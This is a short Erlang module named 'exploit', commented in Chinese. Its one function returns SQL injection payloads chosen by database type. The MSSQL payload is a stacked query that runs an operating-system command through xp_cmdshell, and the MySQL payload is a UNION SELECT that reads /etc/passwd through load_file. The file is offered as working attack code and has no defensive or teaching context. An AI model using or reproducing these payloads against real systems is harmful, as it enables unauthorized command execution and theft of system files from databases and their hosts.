-module(exploit).
-export([get_shell_cmd/1]).

%% get_shell_cmd/1 - 根据数据库类型获取命令执行payload
%% 参数：
%%   - Dbms：数据库类型（mssql/mysql）
%% 返回：对应的命令执行payload字符串
get_shell_cmd(Dbms) ->
    case Dbms of
        mssql -> "'; exec xp_cmdshell('whoami')--";
        mysql -> "' UNION SELECT load_file('/etc/passwd')--";
        _ -> ""
    end.
